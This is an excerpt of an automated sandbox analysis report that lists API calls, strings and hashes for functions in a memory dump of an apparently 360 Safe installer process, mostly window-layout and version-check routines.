Instruction Fuzzy Hash: D1E03933104210ABD6209BA9DD84D9BB7EAEF88760F044A19F659A3261CA316C20CBA1

Function 00AD1DAD Relevance: 72.4, APIs: 38, Strings: 3, Instructions: 626
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00AD1DCC

Part of subcall function 00A8B9B4: __EH_prolog3.LIBCMT ref: 00A8B9BB

GetClientRect.USER32(?,?), ref: 00AD1DF6

Part of subcall function 00AB72A6: __EH_prolog3.LIBCMT ref: 00AB72C5
Part of subcall function 00AB72A6: _memset.LIBCMT ref: 00AB72EC

Part of subcall function 00AB73D5: __EH_prolog3.LIBCMT ref: 00AB73F4
Part of subcall function 00AB73D5: _memset.LIBCMT ref: 00AB7422

SetTimer.USER32(?,0000012E,000007D0,00000000), ref: 00AD1E4D
_memset.LIBCMT ref: 00AD1EAF
_memset.LIBCMT ref: 00AD1EC6
GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00AD1ED7
PathCombineW.SHLWAPI(?,?,360\360Safe,00000000,0000005C,00000000,00000000,?,?,?,?,?,00B3CC68), ref: 00AD1F35

Part of subcall function 00AD041E: __EH_prolog3.LIBCMT ref: 00AD0425

_memset.LIBCMT ref: 00AD1FEF
_memset.LIBCMT ref: 00AD2038
PostMessageW.USER32(00003922,C:\Program Files (x86)\360\360Safe,00000001,?), ref: 00AD2063
MoveWindow.USER32(?,00000130,00000118,0000008C,00000028,00000001,?,?,00000000), ref: 00AD2093
MoveWindow.USER32(?,000000E5,000000A0,0000008C,00000028,00000001,?,?,00000000), ref: 00AD20C1
MoveWindow.USER32(?,00000012,0000013C,0000005F,00000014,00000001,?,00000000), ref: 00AD20DA
GetWindowRect.USER32(?,?), ref: 00AD20F9
GetWindowRect.USER32(?,?), ref: 00AD2130
SetWindowPos.USER32(?,00000000,0000009F,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD2149

Part of subcall function 00AC1E2D: __EH_prolog3.LIBCMT ref: 00AC1E34
Part of subcall function 00AC1E2D: GetWindowTextW.USER32(?,00000000,00000064), ref: 00AC1E5D
Part of subcall function 00AC1E2D: GetDC.USER32(?), ref: 00AC1E70
Part of subcall function 00AC1E2D: GetWindowRect.USER32(?,?), ref: 00AC1E8B
Part of subcall function 00AC1E2D: SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00AC1EFC

GetWindowRect.USER32(?,?), ref: 00AD218A
SetWindowPos.USER32(?,00000000,?,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD21A2

Part of subcall function 00AC2FDE: __EH_prolog3_GS.LIBCMT ref: 00AC2FE5
Part of subcall function 00AC2FDE: SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00AC3038
Part of subcall function 00AC2FDE: EndPaint.USER32(?,?), ref: 00AC3045

GetWindowRect.USER32(?,?), ref: 00AD21DE
SetWindowPos.USER32(?,00000000,?,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD21F6
GetWindowRect.USER32(?,?), ref: 00AD2236
SetWindowPos.USER32(?,00000000,?,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD224D
GetWindowRect.USER32(?,?), ref: 00AD2280
GetWindowRect.USER32(?,?), ref: 00AD22D2
SetWindowPos.USER32(?,00000000,?,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD22EA
GetWindowRect.USER32(?,?), ref: 00AD232A
SetWindowPos.USER32(?,00000000,?,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD2342
GetWindowRect.USER32(?,?), ref: 00AD237E
SetWindowPos.USER32(?,00000000,?,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD2395
GetWindowRect.USER32(?,?), ref: 00AD23CB
SetWindowPos.USER32(?,00000000,?,000000F9,00000000,00000000,00000005,?,00000000), ref: 00AD23ED
GetDlgItem.USER32(?,00000419), ref: 00AD2418

Part of subcall function 00ACB123: GetParent.USER32(00000000), ref: 00ACB143
Part of subcall function 00ACB123: GetWindowRect.USER32(00000000,?), ref: 00ACB161
Part of subcall function 00ACB123: SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005), ref: 00ACB191

MoveWindow.USER32(?,00000006,00000114,00000078,00000024,00000001,00000418,PNG,00000001,?,00000000), ref: 00AD246B
ShowWindow.USER32(?,00000000,?,00000000), ref: 00AD2484
ShowWindow.USER32(?,00000000,?,00000000), ref: 00AD2491
GetDlgItem.USER32(?,0000041B), ref: 00AD24BC
MoveWindow.USER32(?,00000006,00000114,00000078,00000024,00000001,0000041B,PNG,00000001,?,00000000), ref: 00AD250F
ShowWindow.USER32(?,00000000,?,00000000), ref: 00AD251C

Strings

PNG, xrefs: 00AD242B, 00AD24CF
360\360Safe, xrefs: 00AD1F26
C:\Program Files (x86)\360\360Safe, xrefs: 00AD1FE9, 00AD1FEE, 00AD2002, 00AD2032, 00AD2037, 00AD204B

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Window$Rect$H_prolog3_memset$Move$Show$Item$ClientCombineDirectoryH_prolog3_MessagePaintParentPathPostSystemTextTimer
String ID: 360\360Safe$C:\Program Files (x86)\360\360Safe$PNG
API String ID: 2096816715-59599569
Opcode ID: a5f95394d10cd8e60a7255e830b95f0bee1ef5daf17d7015f5c2563ec1bb6e40
Instruction ID: 50d27e4545e24430f200a7c6e3281208e8cfefccafabe8ea6c2982d8e8d4a71d
Opcode Fuzzy Hash: a5f95394d10cd8e60a7255e830b95f0bee1ef5daf17d7015f5c2563ec1bb6e40
Instruction Fuzzy Hash: D1225F71640608BFEB21EBB4CD46FFFB7BAAF48704F000829F656A6192DB716904CB51

Function 00AD0B81 Relevance: 68.6, APIs: 38, Strings: 1, Instructions: 373
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003EA), ref: 00AD0BC6
GetDlgItem.USER32(?,0000044E), ref: 00AD0BF9

Part of subcall function 00AA6C96: SetWindowLongW.USER32(?,000000FC,?), ref: 00AA6CBC

GetDlgItem.USER32(?,0000044F), ref: 00AD0C20
ShowWindow.USER32(?,00000000,000000CF,PNG,0000044F,PNG,00000004,000000CF,PNG,00000004), ref: 00AD0C7F
MoveWindow.USER32(?,000000D6,000000B4,000000C8,0000001E,00000001,00000000), ref: 00AD0CA2
ShowWindow.USER32(?,00000005,00B35634,00FFFFFF), ref: 00AD0CDD
ShowWindow.USER32(?,00000000), ref: 00AD0CF5
ShowWindow.USER32(?,00000000), ref: 00AD0D1F
GetDlgItem.USER32(?,000003F3), ref: 00AD0D78
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00AD0DB6
ShowWindow.USER32(?,00000000), ref: 00AD0DC3
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00AD0DD3

Part of subcall function 00AC134F: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000006,?,?,00000000,?,?,?,00AA77F9,0000013F,PNG), ref: 00AC13A1

_memset.LIBCMT ref: 00AD0E26
GetSystemDirectoryW.KERNEL32(?,000000FF), ref: 00AD0E38
GetDlgItem.USER32(?,0000044D), ref: 00AD0E63
ShowWindow.USER32(?,00000000,004F4F4F,00B35628), ref: 00AD0E98
GetDlgItem.USER32(?,00000405), ref: 00AD0EDF
ShowWindow.USER32(?,00000000), ref: 00AD0F03
GetDlgItem.USER32(?,00000458), ref: 00AD0F55
ShowWindow.USER32(?,00000000), ref: 00AD0F79
GetDlgItem.USER32(?,0000041A), ref: 00AD0FAE

Part of subcall function 00A7DFB0: __CxxThrowException@8.LIBCMT ref: 00A7DFC2

ShowWindow.USER32(?,00000000,004F4F4F,00B35624), ref: 00AD0FE3
GetDlgItem.USER32(?,00000416), ref: 00AD102A
ShowWindow.USER32(?,00000000), ref: 00AD104E
GetDlgItem.USER32(?,000003F4), ref: 00AD1072
ShowWindow.USER32(00000000,00000000), ref: 00AD1076
GetDlgItem.USER32(?,00000413), ref: 00AD1080
ShowWindow.USER32(00000000,00000000), ref: 00AD1084
GetDlgItem.USER32(?,00000414), ref: 00AD108E
ShowWindow.USER32(00000000,00000000), ref: 00AD1092
GetDlgItem.USER32(?,000003F6), ref: 00AD109C
ShowWindow.USER32(00000000,00000000), ref: 00AD10A0
GetDlgItem.USER32(?,000003F7), ref: 00AD10AA
ShowWindow.USER32(00000000,00000000), ref: 00AD10AE
GetDlgItem.USER32(?,0000040E), ref: 00AD10B8
ShowWindow.USER32(00000000,00000000), ref: 00AD10BC
GetDlgItem.USER32(?,00000419), ref: 00AD10C6
ShowWindow.USER32(00000000,00000000), ref: 00AD10CA

Part of subcall function 00ACF7F0: CreateSolidBrush.GDI32(00FFFFFF), ref: 00ACF81D
Part of subcall function 00ACF7F0: GetDlgItem.USER32(?,0000040F), ref: 00ACF84A
Part of subcall function 00ACF7F0: GetDlgItem.USER32(?,000003EB), ref: 00ACF8CF
Part of subcall function 00ACF7F0: GetDlgItem.USER32(?,00000410), ref: 00ACF925
Part of subcall function 00ACF7F0: GetDlgItem.USER32(?,000003EC), ref: 00ACF965

Part of subcall function 00AD08F0: __EH_prolog3.LIBCMT ref: 00AD08F7
Part of subcall function 00AD08F0: GetDlgItem.USER32(?,00000415), ref: 00AD0A0B
Part of subcall function 00AD08F0: EnableWindow.USER32(00000000,00000000), ref: 00AD0A13
Part of subcall function 00AD08F0: MoveWindow.USER32(?,00000048,00000095,0000003C,00000014,00000001,?,0000002C), ref: 00AD0A32
Part of subcall function 00AD08F0: GetWindowRect.USER32(?,?), ref: 00AD0A3E

Strings

PNG, xrefs: 00AD0C3A, 00AD0C4B, 00AD0C50, 00AD0C61, 00AD0D88

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Window$Item$Show$MessageMoveSend$BrushCreateDirectoryEnableException@8H_prolog3LongRectSolidSystemThrow_memset
String ID: PNG
API String ID: 1048186457-364855578
Opcode ID: c0a783cb95b1fea6bb540c4a0a9756c5338be91e013da1ef8f03f10627c56bc3
Instruction ID: b78a683f3871c43c353d5fc1b933bbfb2698a653ef99c14b35ddec579b3ef5fd
Opcode Fuzzy Hash: c0a783cb95b1fea6bb540c4a0a9756c5338be91e013da1ef8f03f10627c56bc3
Instruction Fuzzy Hash: FAD16E30240B08AFD631AB71CE56FEBBBA9EF44744F00492DF1AB561A2DF767914DA10

Function 00AC6F7F Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 174
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateSolidBrush.GDI32(00FFFFFF), ref: 00AC6F99

Part of subcall function 00AC65A6: __EH_prolog3.LIBCMT ref: 00AC65AD
Part of subcall function 00AC65A6: GetDlgItem.USER32(?,00000403), ref: 00AC65D5
Part of subcall function 00AC65A6: GetDlgItem.USER32(?,000003EF), ref: 00AC665A
Part of subcall function 00AC65A6: GetDlgItem.USER32(?,000003F1), ref: 00AC66B4
Part of subcall function 00AC65A6: GetDlgItem.USER32(?,00000411), ref: 00AC66E7

MoveWindow.USER32(?,000000D7,000000A7,000000AF,00000050,00000001), ref: 00AC6FCB
GetClientRect.USER32(?,?), ref: 00AC6FE1
MoveWindow.USER32(?,00000212,0000013E,00000032,00000014,00000001), ref: 00AC6FFD
MoveWindow.USER32(?,00000027,00000008,00000090,0000001E,00000001), ref: 00AC7012
MoveWindow.USER32(?,0000003C,0000003F,00000046,00000014,00000001,?,00000027,00000008,00000131,PNG), ref: 00AC7041
GetWindowRect.USER32(?,?), ref: 00AC704D

Part of subcall function 00AA60A3: ScreenToClient.USER32(?,?), ref: 00AA60B5
Part of subcall function 00AA60A3: ScreenToClient.USER32(?,?), ref: 00AA60C1

GetDlgItem.USER32(?,000003EE), ref: 00AC7065

Part of subcall function 00A87EB5: __EH_prolog3.LIBCMT ref: 00A87EBC

SendMessageW.USER32(?,00000030,?,00000001), ref: 00AC707E
MoveWindow.USER32(?,?,0000003C,0000003C,0000001C,00000001), ref: 00AC70D1
MoveWindow.USER32(?,?,00000050,00000109,00000014,00000001), ref: 00AC70EC
MoveWindow.USER32(?,0000018E,00000050,00000050,00000014,00000001), ref: 00AC7106

Part of subcall function 00AC4B9F: GetWindowRect.USER32(?,?), ref: 00AC4BBC
Part of subcall function 00AC4B9F: GetWindowTextLengthW.USER32(?), ref: 00AC4BD0
Part of subcall function 00AC4B9F: GetDC.USER32(?), ref: 00AC4BDB
Part of subcall function 00AC4B9F: _memset.LIBCMT ref: 00AC4BEB
Part of subcall function 00AC4B9F: GetTextMetricsW.GDI32(00000000,?), ref: 00AC4BF8
Part of subcall function 00AC4B9F: ReleaseDC.USER32(?,00000000), ref: 00AC4C0B
Part of subcall function 00AC4B9F: MoveWindow.USER32(?,?,?,00000000,?,00000001), ref: 00AC4C2C

MoveWindow.USER32(?,0000003C,00000087,00000046,00000014,00000001), ref: 00AC7129
ShowWindow.USER32(?,00000000), ref: 00AC7139
GetClientRect.USER32(?,?), ref: 00AC7141
ShowWindow.USER32(00000000,00000000,?), ref: 00AC71A3

Part of subcall function 00AB407A: ShowScrollBar.USER32(00000005,00000003,00000000,00000018,00000000,?,00000018), ref: 00AB40A5

Strings

<, xrefs: 00AC7090
X, xrefs: 00AC70B0
PNG, xrefs: 00AC7014
CustomContrlList, xrefs: 00AC717E

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Window$Move$Item$ClientRect$Show$H_prolog3ScreenText$BrushCreateLengthMessageMetricsReleaseScrollSendSolid_memset
String ID: <$CustomContrlList$PNG$X
API String ID: 3202666548-2186719467
Opcode ID: 013e930a005c6f8225392448bc112ed0c182d88ef63b4b2cd793bebb06c804b0
Instruction ID: 3329c17af068a7805050dad557b14bfe72e6d4b4a94d95ccd85dcbf460c2b465
Opcode Fuzzy Hash: 013e930a005c6f8225392448bc112ed0c182d88ef63b4b2cd793bebb06c804b0
Instruction Fuzzy Hash: B5515471A50308BFEB21AF64CD46FDE7BB9AF18B00F000419F655BA1E1DBB16A04CB51

Function 00AA8F5A Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 224
windowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00AA8F8F
GetWindowLongW.USER32(?,000000EC), ref: 00AA8F97

Part of subcall function 00AA7927: GetWindowLongW.USER32(-00000004,000000F0), ref: 00AA7949
Part of subcall function 00AA7927: SendMessageW.USER32(-00000004,0000007F,00000000,00000000), ref: 00AA7984
Part of subcall function 00AA7927: SendMessageW.USER32(-00000004,00000080,00000000,00000000), ref: 00AA7997
Part of subcall function 00AA7927: GetDlgItem.USER32(-00000004,0000E801), ref: 00AA79A4
Part of subcall function 00AA7927: IsWindow.USER32(00000000), ref: 00AA79AE
Part of subcall function 00AA7927: GetClientRect.USER32(-00000004,?), ref: 00AA79F8
Part of subcall function 00AA7927: GetDlgItem.USER32(-00000004,0000E801), ref: 00AA7A1F
Part of subcall function 00AA7927: IsWindow.USER32(00000000), ref: 00AA7A2C

SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AA8FC2
SetWindowLongW.USER32(?,000000EC,?), ref: 00AA8FCC
SetWindowTextW.USER32(?,?), ref: 00AA8FF7

Part of subcall function 00AA6180: GetWindowLongW.USER32(?,000000F0), ref: 00AA6198
Part of subcall function 00AA6180: GetParent.USER32 ref: 00AA61AD
Part of subcall function 00AA6180: GetWindowRect.USER32(?,?), ref: 00AA61C7
Part of subcall function 00AA6180: GetWindowLongW.USER32(?,000000F0), ref: 00AA61DD
Part of subcall function 00AA6180: MonitorFromWindow.USER32(?,00000002), ref: 00AA61FC

GetSystemMetrics.USER32(0000000C), ref: 00AA9017
GetSystemMetrics.USER32(0000000B), ref: 00AA901C
LoadImageW.USER32(?,00000080,00000001,00000000), ref: 00AA9026
SendMessageW.USER32(?,00000080,00000001,00000000), ref: 00AA9032
GetSystemMetrics.USER32(00000032), ref: 00AA9045
GetSystemMetrics.USER32(00000031), ref: 00AA904A
LoadImageW.USER32(?,00000080,00000001,00000000), ref: 00AA9054
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00AA9061
GetCurrentThreadId.KERNEL32 ref: 00AA9067

Part of subcall function 00AA7EF3: EnterCriticalSection.KERNEL32(00B5BC7C), ref: 00AA7F09
Part of subcall function 00AA7EF3: LeaveCriticalSection.KERNEL32(00B5BC7C), ref: 00AA7F1E

Part of subcall function 00AA749D: __recalloc.LIBCMT ref: 00AA74E3

Part of subcall function 00AA7530: __recalloc.LIBCMT ref: 00AA7576

Part of subcall function 00AA5AFC: _memset.LIBCMT ref: 00AA5B0D
Part of subcall function 00AA5AFC: SHAppBarMessage.SHELL32(00000000,?), ref: 00AA5B2F

KiUserCallbackDispatcher.NTDLL(?,00000001,?,?,?,?,?,?,?,00B265E9,000000FF), ref: 00AA90D0
KiUserCallbackDispatcher.NTDLL(?,00000000,?,?,?,?,?,?,?,00B265E9,000000FF), ref: 00AA90D7
PostMessageW.USER32(?,00003AB1,00000000,00000000), ref: 00AA9121

Strings

PNG, xrefs: 00AA9181

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Window$Long$Message$MetricsSendSystem$CallbackCriticalDispatcherImageItemLoadRectSectionUser__recalloc$ClientCurrentEnterFromLeaveMonitorParentPostTextThread_memset
String ID: PNG
API String ID: 2213159910-364855578
Opcode ID: 6a164f42191b42ae5c7cc7876def3fe7066c6daa4981669fe8afb00f714964f0
Instruction ID: 6e46b8b68558b0c92bb7fa31e9b2d508d993e5c5470a53d1df13bc76606bb8fb
Opcode Fuzzy Hash: 6a164f42191b42ae5c7cc7876def3fe7066c6daa4981669fe8afb00f714964f0
Instruction Fuzzy Hash: 0A719A71204304AFE714EF64CC85FABBBA9FF49344F100629F5528B2E2DB76E8018B61

Function 00ADE0D8 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 191
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00ADE0F7
_memset.LIBCMT ref: 00ADE11A
SHGetValueW.SHLWAPI(?,?,?,?,?,00000080,?,?,00000018), ref: 00ADE13C
PathCombineW.SHLWAPI(?,?,?,?,?,?,00000018), ref: 00ADE186
PathFileExistsW.SHLWAPI(?,?,?,00000018), ref: 00ADE18F
_memset.LIBCMT ref: 00ADE1DE
PathCombineW.SHLWAPI(?,?,360ver.dll,?,?,?,?,?,00000018), ref: 00ADE1F5
PathCombineW.SHLWAPI(00000000,?,360Common.dll,?,?,?,?,?,00000018), ref: 00ADE203
PathCombineW.SHLWAPI(?,?,360Base.dll,?,?,?,?,?,00000018), ref: 00ADE214
GetProcAddress.KERNEL32(00000000,Get360SafeVersion), ref: 00ADE274
GetProcAddress.KERNEL32(?,IsBetaVersion), ref: 00ADE281
_memset.LIBCMT ref: 00ADE2C1

Strings

360ver.dll, xrefs: 00ADE1E6
360Base.dll, xrefs: 00ADE205
IsBetaVersion, xrefs: 00ADE276
0.0.0.0, xrefs: 00ADE2DA
Get360SafeVersion, xrefs: 00ADE26E
360Common.dll, xrefs: 00ADE1F7

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Path$Combine$_memset$AddressProc$ExistsFileH_prolog3Value
String ID: 0.0.0.0$360Base.dll$360Common.dll$360ver.dll$Get360SafeVersion$IsBetaVersion
API String ID: 2656314946-96710800
Opcode ID: 08745d8c1c9c9f15cde77a9409fe23e86a7c1d74090c33b9e896579df33f06a6
Instruction ID: 91bd6a6420462c43d4903cff488ff0499b4796d0fe12fa0b1b827f26911cde74
Opcode Fuzzy Hash: 08745d8c1c9c9f15cde77a9409fe23e86a7c1d74090c33b9e896579df33f06a6
Instruction Fuzzy Hash: 5E613B76900249ABDF21EFA5DC85EEF77BCEB48704F10442AE556DB281EB71A604CB60

Function 00AA7927 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 258
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongW.USER32(-00000004,000000F0), ref: 00AA7949
SendMessageW.USER32(-00000004,0000007F,00000000,00000000), ref: 00AA7984
SendMessageW.USER32(-00000004,00000080,00000000,00000000), ref: 00AA7997
GetDlgItem.USER32(-00000004,0000E801), ref: 00AA79A4
IsWindow.USER32(00000000), ref: 00AA79AE
GetClientRect.USER32(-00000004,?), ref: 00AA79F8
GetDlgItem.USER32(-00000004,0000E801), ref: 00AA7A1F
IsWindow.USER32(00000000), ref: 00AA7A2C
IsWindow.USER32(00000000), ref: 00AA7A66
GetWindowRect.USER32(00000000,00000000), ref: 00AA7A83
GetWindowRect.USER32(-00000004,000000FF), ref: 00AA7AF9
GetDlgItem.USER32(-00000004,000003E8), ref: 00AA7B7D
GetWindowRect.USER32(00000000,00000000), ref: 00AA7B96
MapWindowPoints.USER32(00000000,-00000004,00000000,00000002), ref: 00AA7BA6
MapWindowPoints.USER32(00000000,-00000004,00000000,00000002), ref: 00AA7A93

Part of subcall function 00AA6FE3: __recalloc.LIBCMT ref: 00AA702D

GetClientRect.USER32(-00000004,000000FF), ref: 00AA7AE6

Strings

SCROLLBAR, xrefs: 00AA7A59

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Window$Rect$Item$ClientMessagePointsSend$Long__recalloc
String ID: SCROLLBAR
API String ID: 3924995472-324577739
Opcode ID: cbad3e0c86292662219a6a10c12ad04952d71588fdbb531bccfebed2f1cbd1cb
Instruction ID: cbb180b129a1f88d75bdb0f780036cd6ac21f9bbf2536812a58b542354223f0a
Opcode Fuzzy Hash: cbad3e0c86292662219a6a10c12ad04952d71588fdbb531bccfebed2f1cbd1cb
Instruction Fuzzy Hash: 55A12A71904208AFEB51CFA9C985AAFBBF5FF09310F10852AF515E72A0D770DA44CB61

Function 00AC65A6 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 336
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00AC65AD
GetDlgItem.USER32(?,00000403), ref: 00AC65D5

Part of subcall function 00AC3197: InvalidateRect.USER32(?,00000000,00000000,?,?,00AC0207,?), ref: 00AC31AD

GetDlgItem.USER32(?,000003EF), ref: 00AC665A
GetDlgItem.USER32(?,000003F1), ref: 00AC66B4

Part of subcall function 00ABF7D0: SetWindowLongW.USER32(?,000000FC,?), ref: 00ABF7F6

GetDlgItem.USER32(?,00000411), ref: 00AC66E7
GetDlgItem.USER32(000000FF,000003F6), ref: 00AC6774

Part of subcall function 00AA6C96: SetWindowLongW.USER32(?,000000FC,?), ref: 00AA6CBC

GetDlgItem.USER32(000000FF,000003EA), ref: 00AC67C4
ShowWindow.USER32(?,00000000,000000E5,PNG,00000004,?), ref: 00AC680B
GetDlgItem.USER32(000000FF,0000040F), ref: 00AC686E
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00AC68A2
ShowWindow.USER32(?,00000000), ref: 00AC68B0
GetDlgItem.USER32(000000FF,00000410), ref: 00AC68DC
ShowWindow.USER32(?,00000000), ref: 00AC6903
GetDlgItem.USER32(000000FF,00000409), ref: 00AC6932

Part of subcall function 00AC134F: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000006,?,?,00000000,?,?,?,00AA77F9,0000013F,PNG), ref: 00AC13A1

GetDlgItem.USER32(000000FF,000003ED), ref: 00AC69D2

Part of subcall function 00AC62CA: __EH_prolog3.LIBCMT ref: 00AC62D1

Part of subcall function 00AC1610: EnableWindow.USER32(?,?), ref: 00AC161B
Part of subcall function 00AC1610: InvalidateRect.USER32(?,00000000,00000001,?,?,00AA5AF9,?), ref: 00AC162A
Part of subcall function 00AC1610: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00AA5AF9,?), ref: 00AC163C

Strings

PNG, xrefs: 00AC666A, 00AC67F2, 00AC687E

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

